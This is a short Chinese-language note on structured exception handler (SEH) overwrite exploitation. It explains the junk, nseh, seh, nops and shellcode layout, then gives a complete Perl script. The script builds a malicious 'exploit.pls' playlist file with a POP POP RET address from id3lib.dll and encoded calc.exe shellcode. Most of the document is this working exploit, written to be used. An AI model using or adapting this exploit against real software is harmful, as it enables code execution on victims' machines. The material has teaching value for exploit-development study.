漏洞利用框架
#junk + nseh + seh + nops + shellcode
junk->冲掉缓冲区
nseh -> jmp to shellcode , 非地址,而只是汇编指令,理由:异常处理时,会将其指向的地址作为参数带入异常处理函数
EXCEPTION_DISPOSITION __cdecl _except_handler (
struct _EXCEPTION_RECORD *_ExceptionRecord,
void * _EstablisherFrame, //nseh
struct _CONTEXT *_ContextRecord,
void * _DispatcherContext
);
seh -> 异常处理函数地址, POP, POP, RET 将执行流程切到栈中,并且执行nseh指向的指令
#junk + nseh + seh + nops + shellcode my $file = "exploit.pls"; my $junk = "\x90" x 780; my $nseh = "\xEB\x0A\x90\x90"; #jmp 10 my $seh = "\x4E\xA3\x00\x10"; #pop pop ret 0x1000a34e id3lib.dll my $nop = "\x90" x 8; my $payload = #calc.exe "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" . "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" . "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" . "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" . "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" . "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" . "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" . "\x1c\x39\xbd"; open($FILE,">$file"); print $FILE $junk.$nseh.$seh.$nop.$payload.$nop; close($FILE);
时间: 2024-11-07 01:46:43